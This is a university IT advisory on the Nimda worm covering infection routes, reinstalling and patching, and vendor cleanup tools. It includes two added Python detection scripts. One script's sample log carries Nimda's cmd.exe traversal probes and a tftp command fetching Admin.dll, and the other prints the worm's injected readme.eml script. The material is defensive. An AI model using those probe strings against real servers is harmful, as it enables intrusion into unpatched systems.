The W32.Nimda Worm
(updated 1/29/2002)

What is the W32.Nimda Worm?

W32.Nimda is an Internet, file-share, and mass-mailing worm. It spreads by exploiting unpatched Microsoft IIS Web servers and through mass-mailed e-mail attachments named "readme.exe". If successful, it appears to deface the Web pages on the IIS Web site and installs a backdoor. Initial reports indicate that the worm might also spread via network shares. This page will be updated as more information becomes available.

Where can I find more information about this virus?

Below are some links to information posted by others. While we believe this information may be useful and reasonably accurate, we have neither authenticated nor verified any of it.

See Symantec's Web site, NAI's Web site, and F-Secure's Web site for current information on the status of this worm and to find out when virus definition updates will become available. Updates that detect and protect against the Nimda worm are now available for Symantec's Norton Antivirus, NAI's McAfee, and Datafellows' F-Secure. See the CERT Advisory for a technical analysis of the worm.

My dial-up access or network port was disabled. What should I do?

If our log files indicate that your system has been infected and is attempting to infect other systems, your network port has probably been disabled to limit the number of other systems that it can infect. As described above, the worm probably entered through an unpatched version of Microsoft's Web server (IIS) running on your system, by your visiting an infected Web server, through an infected network share, or possibly through an infected e-mail attachment (probably named readme.exe). It is likely that a back door has been installed on your system. Among other things, this backdoor opens to the world complete administrator-level access to your C: drive and leaves behind numerous files to ease reinfection. At this time, the only sure way to recover from this infection is to reformat your disk(s), reinstall all files, and patch your computer. In the next few days, tools may become available that will make the cleanup process easier.

When your system has been reformatted, reinstalled and patched, contact the BU OIT Security Team to arrange to have network access re-enabled. Host inspection may be required before your network access is restored.
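To see what the log evidence referred to above looks like, here is an added example (not code from this page, from CERT, or from any antivirus vendor) that scans IIS W3C extended log lines for the probe requests Nimda sends when it attacks a Web server. The probe strings are the ones documented in the CERT Advisory linked above; the log field order is an assumption stated in the script (check the #Fields: line of your own log), and the sample log lines are constructed. Run against a real IIS log it shows which addresses probed the server and whether any probe was answered with a 200, which is the case in which the server actually ran the requested command.

```python
"""Flag Nimda-style IIS probes in W3C extended log lines.

Added example; not code from the BU page, CERT, or any vendor. The request
strings matched here are the probes documented in CERT Advisory CA-2001-26.
Assumed log field order (from the log's #Fields: header):
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
The sample lines below are constructed, not real traffic.
"""
from collections import Counter
from urllib.parse import unquote

# Constructed sample log. 10.0.0.5 walks the probe list and gets a 200 on two
# cmd.exe requests (the server ran "dir"); 10.0.0.7 attempts the tftp second
# stage that fetches Admin.dll; 10.0.0.9 is ordinary traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 14:02:11 10.0.0.5 GET /index.html - 200
2001-09-18 14:02:12 10.0.0.5 GET /scripts/root.exe /c+dir 404
2001-09-18 14:02:12 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-18 14:02:13 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:02:13 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:05:40 10.0.0.9 GET /images/logo.gif - 200
2001-09-18 14:07:02 10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.7%20GET%20Admin.dll%20c:\\Admin.dll 502
"""

# Executables the worm tries to reach: cmd.exe via directory traversal, and
# root.exe, the copy of cmd.exe left in /scripts and /MSADC by Code Red II.
TARGETS = ("cmd.exe", "root.exe")


def decode_fully(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding, so that %255c
    (double-encoded) and %5c both come out as a backslash. Invalid UTF-8
    sequences such as %c0%af become U+FFFD; the match below does not
    depend on decoding those exactly, only on the target name surviving."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def is_nimda_probe(stem, query):
    """True if the request targets cmd.exe/root.exe with a '/c+...' command."""
    stem_d = decode_fully(stem).lower()
    query_d = decode_fully(query).lower()
    return any(t in stem_d for t in TARGETS) and query_d.startswith("/c+")


def parse_line(line):
    """Parse one W3C line into a dict; None for comments or malformed lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, c_ip, method, stem, query, status = parts[:7]
    try:
        status = int(status)
    except ValueError:
        return None
    return {"ip": c_ip, "method": method, "stem": stem, "query": query, "status": status}


def scan(log_text):
    """Return (list of probe records, Counter of probes per source IP)."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_nimda_probe(rec["stem"], rec["query"]):
            hits.append(rec)
            per_ip[rec["ip"]] += 1
    return hits, per_ip


def executed_probes(hits):
    """Probes answered with 200: the command typically ran, so the host is
    either unpatched (cmd.exe reachable) or already backdoored (root.exe)."""
    return [h for h in hits if h["status"] == 200]


if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for ip, n in per_ip.most_common():
        print(f"{ip}: {n} probe(s)")
    for h in executed_probes(hits):
        print("EXECUTED:", h["ip"], h["stem"], h["query"])
```

A 404 on these requests means the probe was rejected; a 200 on cmd.exe means the traversal worked and the box needs the rebuild described above, and a 200 on root.exe means it was already carrying the Code Red II backdoor before Nimda arrived.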

How can I remove this virus?

Follow the instructions below to remove this virus. If you have any doubts about your ability to remove the virus from your computer, please seek help from your local computing support staff or contact the PCSC (617/353-7272, pcsc@bu.edu). If you are affiliated with Boston University's School of Management, please contact:

Computer Support Services (Room 630)
Boston University School Of Management
617/353-9440

If you are affiliated with Boston University, you can download and install the latest version of Network Associates' McAfee VirusScan for free, as Boston University has a site license for this product. Please visit BU's Anti-Virus software Web site for more information. This site will prompt you for your BU login name and Kerberos password before allowing access.

Specific instructions for removing the W32.Nimda Worm

Currently, there is no known reliable tool to remove this virus. Since this virus attacks many different vulnerabilities at once, we suspect it will take developers a few days to create such a tool, if it can be created at all. In the meantime, the only way to disinfect your computer is to reformat your disk(s), reinstall all files, and patch your computer. CERT currently recommends this as the only effective solution. NOTE: If you MUST run IIS, you must take additional steps to patch the system before reconnecting it to the network. If these steps are not taken, your system will almost certainly become reinfected within a minute or two from the time you reconnect to the network.

Update: If you absolutely can not reinstall all files, you may try the steps outlined below. Should your computer become reinfected, you will have no other choice but to completely rebuild your computer.

Is there anything else I can do to protect myself from this type of attack?

If you do not need to run IIS on your computer, you should turn it off immediately. Guides for doing so are available from Microsoft at:

Microsoft Internet Information Server (IIS)4 for Windows NT
Microsoft Internet Information Server (IIS)5 for Windows 2000

If you decide to continue running IIS on your computer, you should apply all current patches and remain alert for future advisories on IIS and apply those patches as well. Microsoft has a detailed article explaining the steps necessary to prevent your Web site from defacements and such at: www.microsoft.com/technet/columns/insider/default.asp

Steps for securely reinstalling systems that MUST run IIS

This section is now available at:
http://www.bu.edu/security/windows/safeinstall.html

Alternatively, you may want to check into BU's Web Services at www.bu.edu/webcentral/publishing where you will find information about publishing your pages on BU's centrally maintained Web server, freeing you from the need to maintain your own Web server.

I can't possibly reformat my drive(s), reinstall all of my software, and patch my system because I don't have my software on CDs, I don't have any backups, or I don't know how and don't have anyone to help me.

As we've discussed, the only known good solution to Nimda is a complete reformat, reinstall, and patch. However, we understand that this may not be possible for some of you. If this is the case, please follow our "reasonably good" alternative steps outlined below.

1. Permanently disable IIS by downloading and running Microsoft's Code Red Cleaner Tool with the -disable option.

2. Get the Nimda Cleaner from the Anti-Virus vendor of your choice and follow the instructions that come with it. Note that these cleaners must be run TWICE, as indicated in the instructions. Instructions must be followed to the letter for the tool to succeed.

Symantec's Removal Tool
Network Associates/McAfee's tool (note: be sure to read the text instructions next to the link for downloading the tool)

3. Apply the appropriate Microsoft patch for your computer.

4. Get, install, update, and run the virus scanner of your choice.
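After running the cleaner, you will want to confirm that the modified Web pages and the readme.eml files the worm drops are gone. Below is an added example (not code from this page or from any antivirus vendor) that walks a Web root looking for the JavaScript fragment Nimda appends to index/default/main/readme pages (the fragment is the one described in the CERT Advisory linked above) and for readme.eml files. The sample Web root it builds is constructed so the check runs offline. It reports and does not delete anything; as stated above, a rebuild is the only sure fix.

```python
"""Check a web root for the script Nimda appends to web pages.

Added example, not code from the BU page or from any vendor. The injected
fragment is the one described in CERT Advisory CA-2001-26; the sample web
root built here is constructed so the check can run without a real server.
"""
import os
import re
import tempfile

# Fragment Nimda appends to index/default/main/readme .htm/.html/.asp files.
INJECTED_SCRIPT = ('<html><script language="JavaScript">window.open("readme.eml", null, '
                   '"resizable=no,top=6000,left=6000")</script></html>')

# Tolerant match: any script that opens readme.eml, whatever the spacing/quoting.
INJECT_RE = re.compile(r"""window\.open\(\s*["']readme\.eml["']""", re.IGNORECASE)
WEB_EXT = (".htm", ".html", ".asp")


def scan_webroot(root):
    """Return a sorted list of (path relative to root, reason) for suspicious items."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() == "readme.eml":
                findings.append((rel, "worm payload file present"))
                continue
            if name.lower().endswith(WEB_EXT):
                with open(path, "r", encoding="latin-1", errors="replace") as fh:
                    if INJECT_RE.search(fh.read()):
                        findings.append((rel, "injected readme.eml script"))
    return sorted(findings)


def write(path, text):
    with open(path, "w", encoding="latin-1") as fh:
        fh.write(text)


def build_sample_webroot(root):
    """Populate `root` with a constructed mix of clean and modified pages."""
    os.makedirs(os.path.join(root, "docs"), exist_ok=True)
    clean = "<html><body><h1>Department home</h1></body></html>\n"
    write(os.path.join(root, "index.html"), clean + INJECTED_SCRIPT)   # modified
    write(os.path.join(root, "about.html"), clean)                     # clean
    write(os.path.join(root, "docs", "default.asp"),
          '<% Response.Write("ok") %>' + INJECTED_SCRIPT)               # modified
    write(os.path.join(root, "docs", "readme.eml"), "MIME-Version: 1.0\n")  # constructed placeholder
    write(os.path.join(root, "docs", "notes.txt"), 'window.open("readme.eml")')  # not a web page; ignored


def demo():
    """Build the sample web root in a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="nimda-check-")
    build_sample_webroot(root)
    return scan_webroot(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Point scan_webroot at your real Web root (for example the IIS wwwroot directory) rather than calling demo(); any finding after the cleaner has been run twice means the cleanup did not succeed and the system should be rebuilt.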

 


19 September 2001
(updated 1 October 2001)

(updated 29 January 2002)

Office of Information Technology
Boston University